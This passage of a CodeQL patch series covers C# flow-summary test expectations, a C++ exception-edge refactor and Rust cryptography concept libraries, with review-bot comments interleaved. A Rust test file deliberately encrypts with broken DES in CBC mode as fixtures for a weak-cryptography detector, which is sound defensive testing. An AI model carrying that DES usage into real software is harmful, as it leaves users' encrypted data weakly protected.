Microsoft.AspNetCore.Mvc;Controller;View;(System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| 
Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];taint;manual | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(System.Object,System.Type,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[4];Argument[4].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[3];Argument[3].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,System.Func);Argument[2];Argument[2].Parameter[delegate-self];value;hq-generated | 
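Review bot: Of the eight new `Controller;View` rows, only the last one, `View(System.String,System.Object)` reading from `Argument[this].Property[...ViewData]`, has kind `taint`; the other seven are `value`, including the `ViewBag` row for the same overload. If that is unintentional, the model row behind it (not part of this diff) presumably should be `value` and these expectations regenerated. If it is intentional, a comment next to the model entry should explain why this overload differs. The same row appears in the `FlowSummariesFiltered.expected` hunk that follows.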
diff --git a/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected b/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected index 199ccee5a50..4d315854b67 100644 --- a/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected +++ b/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected 
@@ -555,6 +555,14 @@ | Microsoft.AspNetCore.Mvc.ViewFeatures;TryGetValueDelegate;BeginInvoke;(System.Object,System.String,System.Object,System.AsyncCallback,System.Object);Argument[3];Argument[3].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc.ViewFeatures;ViewDataInfo;ViewDataInfo;(System.Object,System.Reflection.PropertyInfo,System.Func);Argument[2];Argument[2].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ApiBehaviorOptions;set_InvalidModelStateResponseFactory;(System.Func);Argument[0];Argument[0].Parameter[delegate-self];value;hq-generated | +| Microsoft.AspNetCore.Mvc;Controller;View;();Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;();Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| 
Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];taint;manual | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(System.Object,System.Type,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[4];Argument[4].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[3];Argument[3].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,System.Func);Argument[2];Argument[2].Parameter[delegate-self];value;hq-generated | From 57fc3fbfe379b622bea2d1154ac151c6fc6ef1fe Mon Sep 17 00:00:00 2001 
From: "REDMOND\\brodes" Date: Thu, 5 Dec 2024 10:10:56 -0500 Subject: [PATCH 0839/1267] Switching from isSeh bools to sublcassed ExceptionEdge. --- .../code/cpp/ir/implementation/EdgeKind.qll | 45 ++++++++++++++++--- .../raw/internal/TranslatedCall.qll | 2 +- .../raw/internal/TranslatedExpr.qll | 4 +- .../raw/internal/TranslatedStmt.qll | 2 +- 4 files changed, 44 insertions(+), 9 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 0fd31c9f45e..6d74ccf30ff 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -8,7 +8,8 @@ private newtype TEdgeKind = TGotoEdge() or // Single successor (including fall-through) TTrueEdge() or // 'true' edge of conditional branch TFalseEdge() or // 'false' edge of conditional branch - TExceptionEdge() or // Thrown exception + TCppExceptionEdge() or // Thrown C++ exception + TSehExceptionEdge() or // Thrown C++ exception TDefaultEdge() or // 'default' label of switch TCaseEdge(string minValue, string maxValue) { // Case label of switch 
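Review bot: The comment on the new `TSehExceptionEdge()` branch in `EdgeKind.qll` was copied from the line above and still reads `// Thrown C++ exception`. It should name the edge it documents: `TSehExceptionEdge() or // Thrown SEH exception`. The `newtype` declaration continues past the end of this hunk.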
@@ -51,12 +52,33 @@ class FalseEdge extends EdgeKindImpl, TFalseEdge { final override string toString() { result = "False" } } +abstract private class ExceptionEdgeImpl extends EdgeKindImpl { } + /** * An "exception" edge, representing the successor of an instruction when that * instruction's evaluation throws an exception. + * + * Exception edges are expclitly sublcassed to + * `CppExceptionEdge` and `SehExceptionEdge` only. + * Further sublcasses, if required, should be added privately + * here for IR efficiency. */ -class ExceptionEdge extends EdgeKindImpl, TExceptionEdge { - final override string toString() { result = "Exception" } +final class ExceptionEdge = ExceptionEdgeImpl; + +/** + * An "exception" edge, representing the successor of an instruction when that + * instruction's evaluation throws an exception for C++ exceptions + */ +class CppExceptionEdge extends ExceptionEdgeImpl, TCppExceptionEdge { + final override string toString() { result = "C++ Exception" } +} + +/** + * An "exception" edge, representing the successor of an instruction when that + * instruction's evaluation throws an exception for SEH exceptions + */ +class SehExceptionEdge extends ExceptionEdgeImpl, TSehExceptionEdge { + final override string toString() { result = "SEH Exception" } } /** @@ -123,9 +145,22 @@ module EdgeKind { FalseEdge falseEdge() { result = TFalseEdge() } /** - * Gets the single instance of the `ExceptionEdge` class. + * Gets an instance of the `CppExceptionEdge` class. */ - ExceptionEdge exceptionEdge() { result = TExceptionEdge() } + CppExceptionEdge cppExceptionEdge() { result = TCppExceptionEdge() } + + /** + * Gets an instance of the `SehExceptionEdge` class. + */ + SehExceptionEdge sehExceptionEdge() { result = TSehExceptionEdge() } + + /** + * Gets an instance of the `ExceptionEdge` class. + */ + ExceptionEdge exceptionEdge() { + result = cppExceptionEdge() or + result = sehExceptionEdge() + } /** * Gets the single instance of the `DefaultEdge` class. 
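Review bot: The QLDoc added above `final class ExceptionEdge = ExceptionEdgeImpl;` contains misspellings: `expclitly sublcassed` and `Further sublcasses`. Suggested wording is `Exception edges are explicitly subclassed to` and `Further subclasses, if required, should be added privately`. The new QLDoc comments for `CppExceptionEdge` and `SehExceptionEdge` also end without a full stop, unlike the class comments around them.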
diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll index 3ee11747635..4f8932c4a28 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll @@ -88,7 +88,7 @@ abstract class TranslatedCall extends TranslatedExpr { result = this.getParent().getChildSuccessor(this, kind) or this.mayThrowException() and - kind = EdgeKind::exceptionEdge(false) and + kind instanceof CppExceptionEdge and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll index 5dc22a810f1..573df94a740 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll @@ -3039,7 +3039,7 @@ class TranslatedDestructorsAfterThrow extends TranslatedElement, TTranslatedDest or // And otherwise, exit this element with an exceptional edge not exists(this.getChild(id + 1)) and - kind = EdgeKind::exceptionEdge(false) and + kind instanceof CppExceptionEdge and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } @@ -3078,7 +3078,7 @@ abstract class TranslatedThrowExpr extends TranslatedNonConstantExpr { result = this.getDestructors().getFirstInstruction(kind) or not exists(this.getDestructors()) and - kind = EdgeKind::exceptionEdge(false) and + kind instanceof CppExceptionEdge and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } 
diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll index 5f70a21fdb8..e0c7d625e81 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll @@ -932,7 +932,7 @@ class TranslatedCatchByTypeHandler extends TranslatedHandler { kind instanceof GotoEdge and result = this.getParameter().getFirstInstruction(kind) or - kind = EdgeKind::exceptionEdge(false) and + kind instanceof CppExceptionEdge and if exists(this.getDestructors()) then result = this.getDestructors().getFirstInstruction(any(GotoEdge edge)) else result = this.getParent().(TranslatedTryStmt).getNextHandler(this, any(GotoEdge edge)) From 7aed4c3cbfedcf9add643c1a802282953bcca242 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Thu, 5 Dec 2024 15:13:38 +0000 Subject: [PATCH 0840/1267] C++: Change note --- cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md diff --git a/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md b/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md new file mode 100644 index 00000000000..2004cd08248 --- /dev/null +++ b/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* The "Badly bounded write" query (`cpp/badly-bounded-write`) query no longer produces results if there is an extraction error in the type of the output buffer. From 6c4e0a99e22a2539fc27fa6ad6109595f5c7ec52 Mon Sep 17 00:00:00 2001 
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 3 Dec 2024 18:00:46 +0000 Subject: [PATCH 0841/1267] Rust: A few more test cases. --- .../query-tests/security/CWE-327/options.yml | 1 + .../security/CWE-327/test_cipher.rs | 26 +++++++++++++++++++ 2 files changed, 27 insertions(+) diff --git a/rust/ql/test/query-tests/security/CWE-327/options.yml b/rust/ql/test/query-tests/security/CWE-327/options.yml index 72d848f4ca0..5a3cf0cab12 100644 --- a/rust/ql/test/query-tests/security/CWE-327/options.yml +++ b/rust/ql/test/query-tests/security/CWE-327/options.yml @@ -7,3 +7,4 @@ qltest_dependencies: - des = { version = "0.8.1" } - rc2 = { version = "0.8.1" } - rc5 = { version = "0.0.1" } + - cbc = { version = "0.1.2" } diff --git a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs index 34f47130e3a..a0230881044 100644 --- a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs +++ b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs 
@@ -115,3 +115,29 @@ fn test_block_cipher( rc5_cipher2.encrypt_block(data.into()); rc5_cipher2.decrypt_block(data.into()); } + +type MyDesEncryptor = cbc::Encryptor; + +fn test_cbc( + key: &[u8], key128: &[u8;16], iv: &[u8], iv128: &[u8;16], + input: &[u8], data: &mut [u8] +) { + let data_len = data.len(); + + // aes + let aes_cipher1 = cbc::Encryptor::::new(key128.into(), iv128.into()); + _ = aes_cipher1.encrypt_padded_mut::(data, data_len).unwrap(); + + // des (broken) + let des_cipher1 = cbc::Encryptor::::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + _ = des_cipher1.encrypt_padded_mut::(data, data_len).unwrap(); + + let des_cipher2 = MyDesEncryptor::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + _ = des_cipher2.encrypt_padded_mut::(data, data_len).unwrap(); + + let des_cipher3 = cbc::Encryptor::::new_from_slices(&key, &iv).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + _ = des_cipher3.encrypt_padded_mut::(data, data_len).unwrap(); + + let des_cipher4 = cbc::Encryptor::::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + _ = des_cipher4.encrypt_padded_b2b_mut::(input, data).unwrap(); +} From 07e3421f6f99381aa299e106cdf19cf52f559d44 Mon Sep 17 00:00:00 2001 
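Review bot: `test_cbc` only exercises `cbc::Encryptor`, whereas the context lines of `test_block_cipher` show `decrypt_block` alongside `encrypt_block`. Decrypting with DES in CBC mode is the same weak-algorithm use, so a `cbc::Decryptor` case over the DES cipher with the same `// $ MISSING: Alert[rust/weak-cryptographic-algorithm]` expectation would keep the two tests parallel. The AES case would also read better with a short comment saying that no alert is expected there.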
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Wed, 4 Dec 2024 14:23:46 +0000 Subject: [PATCH 0842/1267] Rust: Add shared ConceptsShared.qll, CryptoAlgorithms.qll and CryptoAlgorithmNames.qll to Rust. --- config/identical-files.json | 9 +- .../codeql/rust/internal/ConceptsImports.qll | 7 + .../codeql/rust/internal/ConceptsShared.qll | 181 ++++++++++++++++++ .../codeql/rust/security/CryptoAlgorithms.qll | 117 +++++++++++ .../internal/CryptoAlgorithmNames.qll | 84 ++++++++ 5 files changed, 395 insertions(+), 3 deletions(-) create mode 100644 rust/ql/lib/codeql/rust/internal/ConceptsImports.qll create mode 100644 rust/ql/lib/codeql/rust/internal/ConceptsShared.qll create mode 100644 rust/ql/lib/codeql/rust/security/CryptoAlgorithms.qll create mode 100644 rust/ql/lib/codeql/rust/security/internal/CryptoAlgorithmNames.qll diff --git a/config/identical-files.json b/config/identical-files.json index c4436872b9a..064da36677d 100644 --- a/config/identical-files.json +++ b/config/identical-files.json @@ -288,12 +288,14 @@ "CryptoAlgorithms Python/JS/Ruby": [ "javascript/ql/lib/semmle/javascript/security/CryptoAlgorithms.qll", "python/ql/lib/semmle/python/concepts/CryptoAlgorithms.qll", - "ruby/ql/lib/codeql/ruby/security/CryptoAlgorithms.qll" + "ruby/ql/lib/codeql/ruby/security/CryptoAlgorithms.qll", + "rust/ql/lib/codeql/rust/security/CryptoAlgorithms.qll" ], "CryptoAlgorithmNames Python/JS/Ruby": [ "javascript/ql/lib/semmle/javascript/security/internal/CryptoAlgorithmNames.qll", "python/ql/lib/semmle/python/concepts/internal/CryptoAlgorithmNames.qll", - "ruby/ql/lib/codeql/ruby/security/internal/CryptoAlgorithmNames.qll" + "ruby/ql/lib/codeql/ruby/security/internal/CryptoAlgorithmNames.qll", + "rust/ql/lib/codeql/rust/security/internal/CryptoAlgorithmNames.qll" ], "SensitiveDataHeuristics Python/JS": [ "javascript/ql/lib/semmle/javascript/security/internal/SensitiveDataHeuristics.qll", 
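Review bot: The group keys still read "CryptoAlgorithms Python/JS/Ruby" and "CryptoAlgorithmNames Python/JS/Ruby" although each group now lists a Rust copy. The "Concepts Python/Ruby/JS" group in the next hunk has the same problem. Renaming them, for example to `"CryptoAlgorithms Python/JS/Ruby/Rust"`, would keep the labels accurate, assuming nothing else refers to these keys by name.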
@@ -308,7 +310,8 @@ "Concepts Python/Ruby/JS": [ "python/ql/lib/semmle/python/internal/ConceptsShared.qll", "ruby/ql/lib/codeql/ruby/internal/ConceptsShared.qll", - "javascript/ql/lib/semmle/javascript/internal/ConceptsShared.qll" + "javascript/ql/lib/semmle/javascript/internal/ConceptsShared.qll", + "rust/ql/lib/codeql/rust/internal/ConceptsShared.qll" ], "ApiGraphModels": [ "javascript/ql/lib/semmle/javascript/frameworks/data/internal/ApiGraphModels.qll", diff --git a/rust/ql/lib/codeql/rust/internal/ConceptsImports.qll b/rust/ql/lib/codeql/rust/internal/ConceptsImports.qll new file mode 100644 index 00000000000..341f3ade509 --- /dev/null +++ b/rust/ql/lib/codeql/rust/internal/ConceptsImports.qll @@ -0,0 +1,7 @@ +/** + * This file contains imports required for the Rust version of `ConceptsShared.qll`. + * Since they are language-specific, they can't be placed directly in that file, as it is shared between languages. + */ + +import codeql.rust.dataflow.DataFlow::DataFlow as DataFlow +import codeql.rust.security.CryptoAlgorithms as CryptoAlgorithms diff --git a/rust/ql/lib/codeql/rust/internal/ConceptsShared.qll b/rust/ql/lib/codeql/rust/internal/ConceptsShared.qll new file mode 100644 index 00000000000..135f830e47d --- /dev/null +++ b/rust/ql/lib/codeql/rust/internal/ConceptsShared.qll 
@@ -0,0 +1,181 @@ +/** + * Provides Concepts which are shared across languages. + * + * Each language has a language specific `Concepts.qll` file that can import the + * shared concepts from this file. A language can either re-export the concept directly, + * or can add additional member-predicates that are needed for that language. + * + * Moving forward, `Concepts.qll` will be the staging ground for brand new concepts from + * each language, but we will maintain a discipline of moving those concepts to + * `ConceptsShared.qll` ASAP. + */ + +private import ConceptsImports + +/** + * Provides models for cryptographic concepts. + * + * Note: The `CryptographicAlgorithm` class currently doesn't take weak keys into + * consideration for the `isWeak` member predicate. So RSA is always considered + * secure, although using a low number of bits will actually make it insecure. We plan + * to improve our libraries in the future to more precisely capture this aspect. + */ +module Cryptography { + class CryptographicAlgorithm = CryptoAlgorithms::CryptographicAlgorithm; + + class EncryptionAlgorithm = CryptoAlgorithms::EncryptionAlgorithm; + + class HashingAlgorithm = CryptoAlgorithms::HashingAlgorithm; + + class PasswordHashingAlgorithm = CryptoAlgorithms::PasswordHashingAlgorithm; + + /** + * A data-flow node that is an application of a cryptographic algorithm. For example, + * encryption, decryption, signature-validation. + * + * Extend this class to refine existing API models. If you want to model new APIs, + * extend `CryptographicOperation::Range` instead. + */ + class CryptographicOperation extends DataFlow::Node instanceof CryptographicOperation::Range { + /** Gets the algorithm used, if it matches a known `CryptographicAlgorithm`. */ + CryptographicAlgorithm getAlgorithm() { result = super.getAlgorithm() } + + /** Gets the data-flow node where the cryptographic algorithm used in this operation is configured. 
*/ + DataFlow::Node getInitialization() { result = super.getInitialization() } + + /** Gets an input the algorithm is used on, for example the plain text input to be encrypted. */ + DataFlow::Node getAnInput() { result = super.getAnInput() } + + /** + * Gets the block mode used to perform this cryptographic operation. + * + * This predicate is only expected to have a result if two conditions hold: + * 1. The operation is an encryption operation, i.e. the algorithm used is an `EncryptionAlgorithm`, and + * 2. The algorithm used is a block cipher (not a stream cipher). + * + * If either of these conditions do not hold, then this predicate should have no result. + */ + BlockMode getBlockMode() { result = super.getBlockMode() } + } + + /** Provides classes for modeling new applications of a cryptographic algorithms. */ + module CryptographicOperation { + /** + * A data-flow node that is an application of a cryptographic algorithm. For example, + * encryption, decryption, signature-validation. + * + * Extend this class to model new APIs. If you want to refine existing API models, + * extend `CryptographicOperation` instead. + */ + abstract class Range extends DataFlow::Node { + /** Gets the data-flow node where the cryptographic algorithm used in this operation is configured. */ + abstract DataFlow::Node getInitialization(); + + /** Gets the algorithm used, if it matches a known `CryptographicAlgorithm`. */ + abstract CryptographicAlgorithm getAlgorithm(); + + /** Gets an input the algorithm is used on, for example the plain text input to be encrypted. */ + abstract DataFlow::Node getAnInput(); + + /** + * Gets the block mode used to perform this cryptographic operation. + * + * This predicate is only expected to have a result if two conditions hold: + * 1. The operation is an encryption operation, i.e. the algorithm used is an `EncryptionAlgorithm`, and + * 2. The algorithm used is a block cipher (not a stream cipher). 
+ * + * If either of these conditions do not hold, then this predicate should have no result. + */ + abstract BlockMode getBlockMode(); + } + } + + /** + * A cryptographic block cipher mode of operation. This can be used to encrypt + * data of arbitrary length using a block encryption algorithm. + */ + class BlockMode extends string { + BlockMode() { + this = + [ + "ECB", "CBC", "GCM", "CCM", "CFB", "OFB", "CTR", "OPENPGP", + "XTS", // https://csrc.nist.gov/publications/detail/sp/800-38e/final + "EAX" // https://en.wikipedia.org/wiki/EAX_mode + ] + } + + /** Holds if this block mode is considered to be insecure. */ + predicate isWeak() { this = "ECB" } + + /** Holds if the given string appears to match this block mode. */ + bindingset[s] + predicate matchesString(string s) { s.toUpperCase().matches("%" + this + "%") } + } +} + +/** Provides classes for modeling HTTP-related APIs. */ +module Http { + /** Provides classes for modeling HTTP clients. */ + module Client { + /** + * A data-flow node that makes an outgoing HTTP request. + * + * Extend this class to refine existing API models. If you want to model new APIs, + * extend `Http::Client::Request::Range` instead. + */ + class Request extends DataFlow::Node instanceof Request::Range { + /** + * Gets a data-flow node that contributes to the URL of the request. + * Depending on the framework, a request may have multiple nodes which contribute to the URL. + */ + DataFlow::Node getAUrlPart() { result = super.getAUrlPart() } + + /** Gets a string that identifies the framework used for this request. */ + string getFramework() { result = super.getFramework() } + + /** + * Holds if this request is made using a mode that disables SSL/TLS + * certificate validation, where `disablingNode` represents the point at + * which the validation was disabled, and `argumentOrigin` represents the origin + * of the argument that disabled the validation (which could be the same node as + * `disablingNode`). 
+ */ + predicate disablesCertificateValidation( + DataFlow::Node disablingNode, DataFlow::Node argumentOrigin + ) { + super.disablesCertificateValidation(disablingNode, argumentOrigin) + } + } + + /** Provides a class for modeling new HTTP requests. */ + module Request { + /** + * A data-flow node that makes an outgoing HTTP request. + * + * Extend this class to model new APIs. If you want to refine existing API models, + * extend `Http::Client::Request` instead. + */ + abstract class Range extends DataFlow::Node { + /** + * Gets a data-flow node that contributes to the URL of the request. + * Depending on the framework, a request may have multiple nodes which contribute to the URL. + */ + abstract DataFlow::Node getAUrlPart(); + + /** Gets a string that identifies the framework used for this request. */ + abstract string getFramework(); + + /** + * Holds if this request is made using a mode that disables SSL/TLS + * certificate validation, where `disablingNode` represents the point at + * which the validation was disabled, and `argumentOrigin` represents the origin + * of the argument that disabled the validation (which could be the same node as + * `disablingNode`). + */ + abstract predicate disablesCertificateValidation( + DataFlow::Node disablingNode, DataFlow::Node argumentOrigin + ); + } + } + } +} diff --git a/rust/ql/lib/codeql/rust/security/CryptoAlgorithms.qll b/rust/ql/lib/codeql/rust/security/CryptoAlgorithms.qll new file mode 100644 index 00000000000..7176c666c57 --- /dev/null +++ b/rust/ql/lib/codeql/rust/security/CryptoAlgorithms.qll 
@@ -0,0 +1,117 @@ +/** + * Provides classes modeling cryptographic algorithms, separated into strong and weak variants. + * + * The classification into strong and weak are based on Wikipedia, OWASP and Google (2021). + */ + +private import internal.CryptoAlgorithmNames + +/** + * A cryptographic algorithm. + */ +private newtype TCryptographicAlgorithm = + MkHashingAlgorithm(string name, boolean isWeak) { + isStrongHashingAlgorithm(name) and isWeak = false + or + isWeakHashingAlgorithm(name) and isWeak = true + } or + MkEncryptionAlgorithm(string name, boolean isWeak) { + isStrongEncryptionAlgorithm(name) and isWeak = false + or + isWeakEncryptionAlgorithm(name) and isWeak = true + } or + MkPasswordHashingAlgorithm(string name, boolean isWeak) { + isStrongPasswordHashingAlgorithm(name) and isWeak = false + or + isWeakPasswordHashingAlgorithm(name) and isWeak = true + } + +/** + * Gets the most specific `CryptographicAlgorithm` that matches the given `name`. + * A matching algorithm is one where the name of the algorithm matches the start of name, with allowances made for different name formats. + * In the case that multiple `CryptographicAlgorithm`s match the given `name`, the algorithm(s) with the longest name will be selected. This is intended to select more specific versions of algorithms when multiple versions could match - for example "SHA3_224" matches against both "SHA3" and "SHA3224", but the latter is a more precise match. 
+ */ +bindingset[name] +private CryptographicAlgorithm getBestAlgorithmForName(string name) { + result = + max(CryptographicAlgorithm algorithm | + algorithm.getName() = + [ + name.toUpperCase(), // the full name + name.toUpperCase().regexpCapture("^([\\w]+)(?:-.*)?$", 1), // the name prior to any dashes or spaces + name.toUpperCase().regexpCapture("^([A-Z0-9]+)(?:(-|_).*)?$", 1) // the name prior to any dashes, spaces, or underscores + ].regexpReplaceAll("[-_ ]", "") // strip dashes, underscores, and spaces + | + algorithm order by algorithm.getName().length() + ) +} + +/** + * A cryptographic algorithm. + */ +abstract class CryptographicAlgorithm extends TCryptographicAlgorithm { + /** Gets a textual representation of this element. */ + string toString() { result = this.getName() } + + /** + * Gets the normalized name of this algorithm (upper-case, no spaces, dashes or underscores). + */ + abstract string getName(); + + /** + * Holds if the name of this algorithm is the most specific match for `name`. + * This predicate matches quite liberally to account for different ways of formatting algorithm names, e.g. using dashes, underscores, or spaces as separators, including or not including block modes of operation, etc. + */ + bindingset[name] + predicate matchesName(string name) { this = getBestAlgorithmForName(name) } + + /** + * Holds if this algorithm is weak. + */ + abstract predicate isWeak(); +} + +/** + * A hashing algorithm such as `MD5` or `SHA512`. + */ +class HashingAlgorithm extends MkHashingAlgorithm, CryptographicAlgorithm { + string name; + boolean isWeak; + + HashingAlgorithm() { this = MkHashingAlgorithm(name, isWeak) } + + override string getName() { result = name } + + override predicate isWeak() { isWeak = true } +} + +/** + * An encryption algorithm such as `DES` or `AES512`. 
+ */ +class EncryptionAlgorithm extends MkEncryptionAlgorithm, CryptographicAlgorithm { + string name; + boolean isWeak; + + EncryptionAlgorithm() { this = MkEncryptionAlgorithm(name, isWeak) } + + override string getName() { result = name } + + override predicate isWeak() { isWeak = true } + + /** Holds if this algorithm is a stream cipher. */ + predicate isStreamCipher() { isStreamCipher(name) } +} + +/** + * A password hashing algorithm such as `PBKDF2` or `SCRYPT`. + */ +class PasswordHashingAlgorithm extends MkPasswordHashingAlgorithm, CryptographicAlgorithm { + string name; + boolean isWeak; + + PasswordHashingAlgorithm() { this = MkPasswordHashingAlgorithm(name, isWeak) } + + override string getName() { result = name } + + override predicate isWeak() { isWeak = true } +} diff --git a/rust/ql/lib/codeql/rust/security/internal/CryptoAlgorithmNames.qll b/rust/ql/lib/codeql/rust/security/internal/CryptoAlgorithmNames.qll new file mode 100644 index 00000000000..8bb63d97876 --- /dev/null +++ b/rust/ql/lib/codeql/rust/security/internal/CryptoAlgorithmNames.qll 
@@ -0,0 +1,84 @@
+/**
